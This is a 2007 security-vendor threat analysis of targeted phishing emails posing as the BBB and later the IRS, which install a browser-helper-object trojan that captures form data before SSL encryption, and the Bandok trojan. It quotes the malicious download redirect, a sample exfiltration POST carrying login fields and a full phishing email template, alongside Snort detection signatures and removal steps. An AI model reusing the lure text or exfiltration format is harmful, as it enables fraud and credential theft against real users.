- Author: Joe Stewart
- Date: May 24, 2007
The Better Business Bureau is warning of an email phishing scam that uses messages claiming to be from the BBB, in an effort to entice users to click on a malicious link. Dell SecureWorks has investigated this scheme in an attempt to determine the scope and impact of this activity, and protect its customers from attack.
Highlights
- Highly-targeted attack – aimed at specific executive-level company managers
- Steals all interactive data sent from victim's IE browser to remote websites
- Uses browser helper object to access form data before it is SSL-encrypted
- One stolen data repository located. As of Friday, May 25, there are 1, 400 victims and 145 megabytes of data in the repository. Approximately 70 megabytes of data is being collected daily.
The Phish
The initial email looks highly similar to the kind of complaint notice email that the BBB normally sends. An example of one of the phony emails is below:
If the victim downloads the “case documents” they get an executable file which (if ran) will load the trojan BHO onto the system.
The email is tailored to the victim, including their full name, email address and company name in the false complaint. From the data we've gathered, it appears that the attacker is targeting upper-level managers at a wide variety of companies. This data is easily culled from corporate websites or from business-networking services. The attacker is clearly looking to target the most likely people within the company who might be tasked with responding to customer complaints at an escalated level. These targets are also the more likely to have the kinds of accounts that the fraudster can reap the most benefit from.
A Wide Net in a Small Pond
Most phishing/keylogger schemes we see are not targeted – they aim to send millions of emails to random addresses in hopes that they will be able to collect the specific data they are looking for from that small percentage of users that a) uses that particular bank or service, and b) is unknowledgeable about phishing or malware. In contrast, the BBB phishing trojan attempts to collect all interactive data sent out from the web browsers of a small set (relatively speaking) of very high-value targets. In this way they get banking credentials, company and other website logins, plus other information that they might have had no way of knowing the value of in advance. SSL encryption is of no use to stop the theft of sensitive data, since the browser helper object intercepts the request before it is encrypted. Fortunately, only Internet Explorer is capable of loading the BHO, so users of other web browsers are not affected in this case.
The Install
When the malicious link is clicked in the email, a page with the following content is returned:
meta http-equiv="refresh" content="0;url=Complaint_Details_363619942.doc.exe"> <center><img src="toolbar.jpg" border="0">
This results in the following page being displayed to the user:
Although Internet Explorer pops up the warning in the toolbar area, the fake page attempts to entice the user to click on the warning in order to retrieve the file. If the warning is clicked and “Download File...” is selected, the user will receive an additional dialog as shown below:
There is no advanced social-engineering here – most savvy Internet users would immediately recognize something wrong with this picture – a .EXE file pretending to be a .DOC, from a domain that is clearly unrelated to the Better Business Bureau. However, this kind of trick still works – the latest run garnered 842 victims for the fraudster within only a few days.
Data Leakage
Once installed, the BHO intercepts all interactive requests/posts to remote websites within Internet Explorer. The data is sent to a PHP script at a third-party website which has been compromised by the attacker to act as a repository for the stolen data, most often through a PHP shopping cart program. A typical stolen data transfer might look similar to:
POST /catalog/includes/add2.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host:[removed]:80 Content-Length: 57
NOT_A_PARAMETER___BOH___VISITED_URL=http://www.yahoo.com/
If the user is submitting a form to a remote site, the transfer would send the complete contents of every field in the form:
NOT_A_PARAMETER___BOH___VISITED_URL=https://login.yahoo.com/config/login?POSTDATA =NOW&_tries=1&_src=ym&_md5=&_hash=&_js=&_last=&promo=&_intl=us&_bypass=&_partner=&_ u=bh7o6a1253l8s&_v=0&_challenge=D18WuSZWdSJD1pI8alqSGHDk3AW.&_yplus=&_emailCode=& pkg=&stepid=&_ev=&hasMsgr=1&_chkP=Y&_done=http://mail.yahoo.com&_pd=ym_ver%3d0%26c= &login=xxxxxxxxxxx&passwd=xxxxxxxx&_save=Sign In&
The impact of such a wide leakage of information on a single person can not be overstated – the most private parts of peoples' lives can easily be seen in a snapshot of who they send webmail to and who they receive it from, what websites they browse, what they shop for online, bank and credit card account numbers, social security numbers, online payment accounts, their home address entered into shipping forms, what prescriptions they have refilled online, etc. – all things that the victim might think are being transferred privately via SSL, but are being secretly stored in a criminal's database somewhere. Couple that with the high-profile jobs that most of these victims have and it suggests that in some cases, they might have a lot to lose if certain aspects of their personal lives were revealed. This kind of thinking is surely not lost on the criminals behind this scheme.
Detection and Removal
SecureWorks has developed the following Snort signature to detect leakage of data from the trojan:
alert tcp any any -> any 80 (msg:"iwebho/BBB-phish trojan
leaking user data"; flow:established,to_server; content:"POST|20|/"; depth:6; content:"|20|HTTP/1.1
|0d0a|Content-Type|3a20|application/x-www-form-urlencoded
|0d0a|Host|3a20|"; within:150; content:"Content-Length|3a20|
"; within:100; content:"|0d0a0d0a|"; within:12; content:"VISITED_URL"; within:100; classtype:trojan-activity; reference:url,www.secureworks.com
/research/threats/bbbphish; priority:20; sid:1000659; rev:1;)
The trojan is detected by some antivirus vendors as “Troj/Iwebho” or other non-specific names. Manual removal can be accomplished by removing the browser helper object's registry keys:
- HKLM\software\Classes\CLSID\{C008D693-2421-4A5C-824A-37481B033372}
- HKLM\software\Classes\CLSID\{C008D693-2421-4A5C-824A-37481B033372}\InprocServer32 = "C:\\backup.dll"
- HKLM\software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C008D693-2421-4A5C-824A-37481B033372}
Note that the UUID is likely to change between variants, so running a tool that can enumerate all browser helper objects and disable suspicious ones is suggested.
Update: 2007-05-26
There is currently another run underway of a BBB phishing email first talked about by SANS in March. This scheme is somewhat different than the one above - there is an RTF file attachment to the message with an embedded EXE file (disguised as a PDF). This malware downloads several other pieces of malware, some of which appear to be related to the Bandok trojan. While this email also seems to be highly targeted, the malware it installs is more of a conventional password-stealer/backdoor bot, which only gathers certain types of information from an infected system. It also may fail to traverse corporate firewalls in some cases due to the use of a non-standard outbound communication protocol.
Bandok's command-and-control communication can be detected with the following Snort signature:
alert tcp any any -> any any (msg:"Bandok trojan phoning home (xor by 0xe9 to decode)"; flow:established,to_server; content:"|CF 8F 80 9B 9A 9D CF 95|"; depth:8; dsize:<80; reference:url,www.dshield.org/diary.html?date=2007-03-28; classtype:trojan-activity;
sid:1000623; rev:2;)
Update: 2007-05-31
The BBB phishing scam described above which uses the Bandok trojan has now changed tactics - the emails now claim to come from the IRS. The phishers initially used an open URL redirect on the irs.com website. irs.com is not affiliated with the Internal Revenue Service, but the name could trick victims into thinking it was an official IRS site. The open redirect has since been closed, but we expect the emails to simply be reformatted to again use attachments or another third-party site for download of the malicious code. A sample of the latest email can be seen below:
Dear XXXXX,
We regret to inform you that your company is currently being investigated by our CI department for criminal tax fraud due to a complaint that was filed by xxxxxx on 02/05/2007
Complaint Case Number: MT529057251
Complaint made by: xxxxx
Complaint registered against: xxxxxx Company
Date: 02/05/2007
You are being investigated for submitting false income tax returns with the California Franchise Tax Board. Instructions on how to resolve this issue as well as a copy of the original complaint can be found on the link below.
<http-://www.irs.com/tax.php?url=http://xx.xx.xx.xx/CI/complaints/MT529057251/complaint.rtf>
Criminal Investigation (CI) serves the American public by investigating potential criminal violations of the Internal Revenue Code and related financial crimes in a manner that fosters confidence in the tax system and compliance with the law. Criminal Investigation department resides at:
1111 Constitution Ave NW
Room 2501
Washington, DC 20224
Please note that you are required to review the complaint and fill out the document from the above link and mail it to the CI address.
Update 2007-06-07
The BBB phishing scheme that installed Troj-iwebho has now also been modified to claim to come from the IRS. It looks as if the fraudsters are copying each other, as the template strongly resembles the one we reported on earlier that had the Bandok trojan attached (even claiming to come from the same person, "Mr. Keith McCall"), except there is no attachment, only a URL to an executable download again pretending to be a complaint document.
This time, instead of hacking a third-party website, they've registered the domain "business-complaints.com" as a catchall domain to host the executable file. The domain is hosted in China, registered on May 30, 2007 to one "li hu" from Shanghai. Most likely the registration info is all false, and was registered with a stolen credit card, but still could be a clue as to the general origin of the scam.
Learn more about how organizations can use adversarial security testing to better prepare employees against phishing scams.